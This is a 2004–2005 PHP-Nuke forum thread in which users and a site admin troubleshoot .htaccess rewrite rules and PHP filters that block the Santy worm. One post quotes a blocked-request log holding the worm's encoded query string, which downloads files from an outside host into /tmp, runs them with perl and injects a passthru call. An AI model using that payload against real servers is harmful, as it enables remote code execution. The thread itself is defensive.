Santy Worm attach prevention - RECAP

New Member Joined: Dec 29, 2004 Posts: 2

Hia all,

Perhaps we could redirect all queries containin' the "http://" string in a way:

#variant-5 redirect all inner [ Only registered users can see links on this board! Get registered or login! ] request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]
#variant-6 redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC]

sorry for my bad english guys Smile

yaanno

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

Your English is fine Smile

That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution!

Posted: Wed Dec 29, 2004 8:05 am

Raven wrote:

Your English is fine Smile

That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution!

Thanks Raven,

Unfortunately these solutions doesn't work without mod_rewrite. And the excellent Sentinel is for newer nuke systems only. So what about the older versions? poor guys Wink

My journal currently run under nuke 5.6 (oh my god! Smile

) and broken down by this worm. So i did a hack in my mainfile.php in this way:

foreach ($HTTP_GET_VARS as $secvalue)
{
if (eregi("<[^>]*script*\"?[^>]*>", $secvalue))
{
die ("I don't like you...");
}
elseif (eregi("http", $secvalue))
{
die ("Don't bother me...");
}
elseif (eregi("cd", $secvalue))
{
die ("Go away...");
}
elseif (eregi("cd /tmp;wget", $secvalue))
{
die ("I call the FBI...");
}
}

Cheers and happy Worm-ending Year,

yaanno

Posted: Wed Dec 29, 2004 8:10 am

Correct again! As has been stated elsewhere, if you're with a host that uses Apache and not mod_rewrite - 86 the host and get another one Rolling Eyes

Regular Joined: Jun 08, 2004 Posts: 64

LWP::Simple and lwp-trivial STILL getting thru on my site.

my htaccess:
from the top:

Code:

RewriteEngine on


RewriteCond %{REQUEST_URI} ^visualcoders[NC,OR]


RewriteCond %{REQUEST_URI} ^envidiosos[NC,OR]


RewriteCond %{REQUEST_URI} ^civa[NC,OR]


RewriteCond %{REQUEST_URI} ^filepack.superbr.org[NC,OR]


RewriteCond %{REQUEST_URI} ^lwp-trivial[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^LWP[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^Bullseye.*[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^EmailCollector.*[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon.*[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^EmailWolf.*[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro.*[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^Crescent.*Internet.*ToolPak.*[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^CherryPicker.*[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^fastlwspider/1.0.*[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^SurfWalker.*[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^GetWebPage.*[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial.*[NC,OR]


RewriteCond %{HTTP_USER_AGENT} ^LWP::Trivial [NC]


RewriteCond %{QUERY_STRING} rush=([^&]+)[NC]


#redirect all inner http:// request


RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]


#redirect all inner http request regardless if encoded


RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC] 


RewriteRule ^.*$ noID.php [L]

the reason I have multiple entries for lwp simple and trivial is because I was trying ANYTHING!

I also placed this in my header.php file.

Code:

if (strpos($HTTP_USER_AGENT, 'LWP::Simple') > 0) {


exit;


};


if (strpos($HTTP_USER_AGENT, 'lwp-trivial') > 0) {


exit;


};


if (strpos($HTTP_REFERER, 'myhost.gb.com') > 0) {


exit;


};


if (strpos($HTTP_REFERER, 'mall.uk.net') > 0) {


exit;


};

Posted: Mon Jan 03, 2005 11:49 am

Replace ALL your lwp code with one line:

RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]

Posted: Tue Jan 04, 2005 9:19 am

I made your advised change raven and...
I'm STILL getting hit.
Got 10 more emails in my inbox this morning.
LWP::Simple

Quote:

Date & Time: 2005-01-04 07:43:10
Blocked IP: 69.61.61.146
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.803
Query String: [ Only registered users can see links on this board! Get registered or login! ]
%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
wget%20%0Aatlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;
wget%20atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611112;
rm%20sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611111;
rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B
%20%65%63%68%6F%20%5F%45%4E%44%5F&
highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54
%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68
%5D%29.%2527\';
Forwarded For: none
Client IP: none
Remote Address: 69.61.61.146
Remote Port: 43531
Request Method: GET

Posted: Tue Jan 04, 2005 9:48 am

Post your .htaccess. I know this works. Something is wrong but it's not that code.

Posted: Tue Jan 04, 2005 9:52 am

Code:

RewriteEngine on


RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]


RewriteCond %{REQUEST_URI} ^visualcoders [NC]


RewriteCond %{REQUEST_URI} ^envidiosos [NC]


RewriteCond %{REQUEST_URI} ^civa  [NC]


RewriteCond %{REQUEST_URI} ^filepack.superbr.org  [NC]


RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]


RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]


RewriteRule ^.*$ [ Only registered users can see links on this board! Get registered or login! ] [L]





PHP_FLAG output_buffering on





deny from 148.244.150.52


deny from 200.106.110.236


deny from 200.181.83.243


deny from 219.95.196.80


deny from 68.60.213.202


deny from 200.181.83.243


deny from 148.244.150.52


deny from 219.95.196.80


deny from 200.72.173.120


deny from 209.237.238.181


deny from 192.168.163.167


deny from 68.98.231.137


deny from 82.160.30.194


deny from 81.215.255.48


deny from 67.165.48.29


deny from 209.13.239.235


deny from 66.82.9.54


deny from 209.237.238.180


deny from 200.64.54.223


deny from 212.200.53.61


deny from 81.214.57.246


deny from 211.157.36.6


deny from 211.157.36.4


deny from 12.175.0.35


deny from 203.162.44.73


deny from 213.103.65.23


deny from 10.90.24.11


deny from 80.132.120.148


deny from 209.237.238.166


deny from 213.103.194.140


deny from 217.220.100.158


deny from 207.230.138.240


deny from 208.180.220.197


deny from 66.69.165.44


deny from 213.103.212.15


deny from 81.15.156.33


deny from 203.203.82.241


deny from 212.244.141.2


deny from 202.58.199.241


deny from 132.249.20.69


deny from 195.151.252.177


deny from 195.151.101.150


deny from 217.23.241.101


deny from 64.86.231.98


deny from 210.177.248.65


deny from 12.170.99.234


deny from 67.131.119.83


deny from 80.58.7.235


deny from 80.58.7.235


deny from 80.58.7.235


deny from 80.58.50.42


deny from 66.98.250.82

Posted: Tue Jan 04, 2005 9:59 am

You aren't usinh [NC,OR]. As a result, the rewrite engine treats those as AND. You had them originally. Put them back.

Code:

RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR] 


RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR] 


RewriteCond %{REQUEST_URI} ^envidiosos [NC,OR] 


RewriteCond %{REQUEST_URI} ^civa  [NC,OR] 


RewriteCond %{REQUEST_URI} ^filepack.superbr.org  [NC,OR] 


RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR] 


RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC] 


RewriteRule ^.*$ [ Only registered users can see links on this board! Get registered or login! ] [L]

Posted: Tue Jan 04, 2005 10:06 am

thanks raven I'll give that a try. Thanks for your patience.

Involved Joined: Dec 28, 2003 Posts: 276 Location: Israel

I've tried your code in the .htaccess file, but I still get emails such as this one:

Quote:

Date & Time: 2005-03-03 03:33:55
Blocked IP: 213.167.167.52
User ID: משתמש לא רשום (1)
Reason: Abuse-Harvest
String Match: lwp::simple
--------------------
User Agent: LWP::Simple/5.76
Query String: [ Only registered users can see links on this board! Get registered or login! ]
Forwarded For: none
Client IP: none
Remote Address: 213.167.167.52
Remote Port: 15790
Request Method: GET

here's my .htaccess. could you tell me what's wrong:

Code:

# $Author: zx $ 


# $Date: 2003/08/17 14:03:21 $ 





#Check for Santy Worms and redirect them to a phantom site 


#Variant-1 


RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR] 


#Variant-2 


RewriteCond %{REQUEST_URI} ^visualcoders                [NC,OR] 


#Variant-3 


RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC,OR] 


#Variant-4 


#RewriteCond %{QUERY_STRING} ^(.*)wget(.*)               [NC] 


RewriteRule ^.*$ http://www.goawayanddontcomeback.com   [L] 





# deny most common except .php 


<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$"> 


</FilesMatch> 





<Limit GET PUT POST> 


  Order Allow,Deny 


  deny from 200. 


  Allow from all 


</Limit>








<Files 403.shtml>


order allow,deny


allow from all


</Files>





deny from 81.10.16


deny from 212.98.150


deny from 192.118.48.248

Posted: Thu Mar 03, 2005 7:50 am

Try this instead:

Find:

Code:

#Check for Santy Worms and redirect them to a phantom site


#Variant-1


RewriteCond %{HTTP_USER_AGENT} ^LWP                     [NC,OR]


#Variant-2


RewriteCond %{REQUEST_URI} ^visualcoders                [NC,OR]


#Variant-3


RewriteCond %{QUERY_STRING} rush=([^&]+)                [NC,OR]


#Variant-4


#RewriteCond %{QUERY_STRING} ^(.*)wget(.*)               [NC]

And replace with:

Code:

RewriteCond %{QUERY_STRING} ^(.*)configdir(.*)          [NC,OR]


RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]


RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]


RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]


RewriteCond %{QUERY_STRING} ^(.*)wget\%20

That pretty much covers mine.

Posted: Thu Mar 03, 2005 4:34 pm

Thanks alot. updated.
Now we'll see if more emails are coming in...

thanks again!

Posted: Fri Mar 04, 2005 2:26 am

Yet, no go! Sad

here's one of three email I got today:

Code:

Date & Time: 2005-03-03 17:56:03


Blocked IP: 213.196.37.240


User ID: îùúîù ìà øùåí (1)


Reason: Abuse-Harvest


String Match: lwp::simple


--------------------


User Agent: LWP::Simple/5.36


Query String: [ Only registered users can see links on this board! Get registered or login! ]


Forwarded For: none


Client IP: none


Remote Address: 213.196.37.240


Remote Port: 2720


Request Method: GET

HELP!!!!!!!!!!!!

Posted: Fri Mar 04, 2005 2:37 am

ring_c, do you have this line in your .htaccess?

RewriteEngine on

Posted: Fri Mar 04, 2005 2:43 am

Raven wrote:

ring_c, do you have this line in your .htaccess?

RewriteEngine on

Nope...

Here's my current .htaccess:

Code:

# $Author: zx $ 


# $Date: 2003/08/17 14:03:21 $ 





RewriteCond %{QUERY_STRING} ^(.*)configdir(.*)          [NC,OR] 


RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR] 


RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR] 


RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR] 


RewriteCond %{QUERY_STRING} ^(.*)wget\%20


RewriteRule ^.*$ http://www.goawayanddontcomeback.com   [L] 





# deny most common except .php 


<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$"> 


</FilesMatch> 





<Limit GET PUT POST> 


  Order Allow,Deny 


  deny from 200. 


  Allow from all 


</Limit>








<Files 403.shtml>


order allow,deny


allow from all


</Files>

Anything??? Sad

Posted: Fri Mar 04, 2005 3:36 am

Without that line, mod_rewrite isn't turned on. Therefore, it won't work. look at the examples above to see how it's supposed to be Wink

Posted: Fri Mar 04, 2005 4:15 am

Quote:

Without that line, mod_rewrite isn't turned on. Therefore, it won't work. look at the examples above to see how it's supposed to be

Oops... how have I missed that?!

Just a sec.... is mod_rewrite a modudle I need to install with my phpnuke or something?

Posted: Fri Mar 04, 2005 4:23 am

mod_rewrite is an Apache module. Run phpinfo() to see if it is installed.

Posted: Fri Mar 04, 2005 5:05 am

Raven wrote:

Without that line, mod_rewrite isn't turned on.
Therefore, it won't work. look at the examples above to see how it's
supposed to be

True! Generally speaking, rewrite configurations are not inherited, even
though the conditions, rules, et cetera are. So, I always add this line (once)
at the top of all my .htaccess file[s] just to play it safe... Wink

Posted: Fri Mar 04, 2005 6:20 am

Quote:

mod_rewrite is an Apache module. Run phpinfo() to see if it is installed.

I don't have access to the shell (command prompt). Sad

Is there any other way to tell?

Posted: Fri Mar 04, 2005 6:25 am

Oh, I've found my host company provides a link to run phpinfo(). I've searched for "rewrite" and only found that:

Under configuration/Standard there's a table. the relevant line says:
Directove: url_rewriter.tags
Local Value: a=href,area=href,frame=src,form=,fieldset=
Master Value: a=href,area=href,frame=src,form=,fieldset=

Is that ok?

Posted: Fri Mar 04, 2005 7:34 am

You don't need a shell anyway. Just save this script to a file and run it:

Code:

<? 


phpinfo(); 


?>

Scroll down to the Apache: Loaded Modules section and see if mod_rewrite is listed

Code:

mod_auth_passthrough, mod_log_bytes, mod_bwlimited, mod_php4, mod_frontpage, mod_ssl, mod_setenvif, mod_so, mod_auth, mod_access, MOD_REWRITE, mod_alias, mod_userdir, mod_actions, mod_imap, mod_asis, mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, mod_mime, mod_log_config, mod_env, http_core

Posted: Fri Mar 04, 2005 8:07 am

Raven wrote:

You don't need a shell anyway. Just save this script to a file and run it:

Code:

<? 


phpinfo(); 


?>

Scroll down to the Apache: Loaded Modules section and see if mod_rewrite is listed

Code:

mod_auth_passthrough, mod_log_bytes, mod_bwlimited, mod_php4, mod_frontpage, mod_ssl, mod_setenvif, mod_so, mod_auth, mod_access, MOD_REWRITE, mod_alias, mod_userdir, mod_actions, mod_imap, mod_asis, mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, mod_mime, mod_log_config, mod_env, http_core

Thanks, done that and it seems to be the exact page my host supplied before. Yet, no mod_rewrite anywhere on that page.

Couldn't also find any "Loaded Modules" there.